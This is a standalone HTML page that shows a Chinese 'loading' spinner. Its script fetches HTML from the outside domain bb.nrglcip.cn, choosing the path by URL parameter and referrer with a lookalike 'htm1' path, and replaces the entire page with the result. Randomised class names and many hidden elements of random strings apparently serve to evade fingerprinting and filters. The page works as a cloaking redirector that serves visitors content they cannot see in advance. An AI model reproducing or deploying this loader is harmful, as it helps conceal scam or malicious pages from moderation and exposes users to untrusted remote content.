<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .J4YLf580GI {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .J4YLf580GI .LaQUBAoif {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .J4YLf580GI .content {
            line-height: 50px;
            text-align: center
        }

        .J4YLf580GI .img {
            width: 100%
        }

        .J4YLf580GI .JcSQrlI {
            text-align: center
        }

        .J4YLf580GI .JcSQrlI span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .J4YLf580GI .JcSQrlI span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .J4YLf580GI .JcSQrlI span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .J4YLf580GI .JcSQrlI span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .J4YLf580GI .JcSQrlI span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .J4YLf580GI .JcSQrlI span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .J4YLf580GI .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Y3baa6OSQ(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var IQ57bG = Y3baa6OSQ('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ IQ57bG +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ IQ57bG +".html?a=share";
		}
		
        EwPhBGi=url+"#"+new Date().getTime();
        EwPhBGi && function() {
            $.get(EwPhBGi, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >QkI23bNnbiOp6Yxui5Wdqsddf4pDLUyBZ2H8hBV9D1</li>
<h1 style='display:none' >ZN6wt9nE5WsPBYN2ivhh4QBfLCM53mwFgMCjOBXiK</h1>
<b style='display:none' >rptciRostBWeZhYE71RLzrStZ3FVb8zigJRhbAZArC7Uacw3XmQ0d3EkzcRq9WoIXecW69xRzm8NgBYJKEYn</b>
<b style='display:none' >rptciRostBWeZhYE71RLzrStZ3FVb8zigJRhbAZArC7Uacw3XmQ0d3EkzcRq9WoIXecW69xRzm8NgBYJKEYn</b>
<b style='display:none' >rptciRostBWeZhYE71RLzrStZ3FVb8zigJRhbAZArC7Uacw3XmQ0d3EkzcRq9WoIXecW69xRzm8NgBYJKEYn</b>
<img  src='' style='display:none'>
<p  style='display:none'>qGg4bMjCrKuQo1G4PcoXzd0DKjAaH3D8gRI3kyrgzm5swdip82nperXt2skE1rknGC5M71rPIsGY4N4TDbWeo</p>
<b style='display:none' >rptciRostBWeZhYE71RLzrStZ3FVb8zigJRhbAZArC7Uacw3XmQ0d3EkzcRq9WoIXecW69xRzm8NgBYJKEYn</b><div class="J4YLf580GI">
    <div class="LaQUBAoif">
        <div class="JcSQrlI">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>W9s0CEfuihRH739qiMpFOe</a>
<p  style='display:none'>glHtIlllQkVUadQxZs8ktb1Sp2</p>
<a  href='#' style='display:none'>W9s0CEfuihRH739qiMpFOe</a>
<div style='display:none'>eL8NEnSYRoTaR7QRRUu</div>
<div style='display:none'>eL8NEnSYRoTaR7QRRUu</div>
<ul style='display:none' >WEfFeTi1BTTkbLuFG9VHrc4pz7Hyv7A5IZOJpGZRt00Z6S3TtIavg8qgwayTDURmJCcxQF6HwhR8S6XDlFmRiVq</ul>
<p  style='display:none'>glHtIlllQkVUadQxZs8ktb1Sp2</p>
<div style='display:none'>eL8NEnSYRoTaR7QRRUu</div>
<li style='display:none' >TENG6xPlPWZorjJZcldq2u3pzSuhJ5sNsfxewC5eorT3VJ8Vw3zADdoSk5OWJ8qpK15G9eXNAlRVqU0rT7a</li>
<li style='display:none' >TENG6xPlPWZorjJZcldq2u3pzSuhJ5sNsfxewC5eorT3VJ8Vw3zADdoSk5OWJ8qpK15G9eXNAlRVqU0rT7a</li></body>
</html>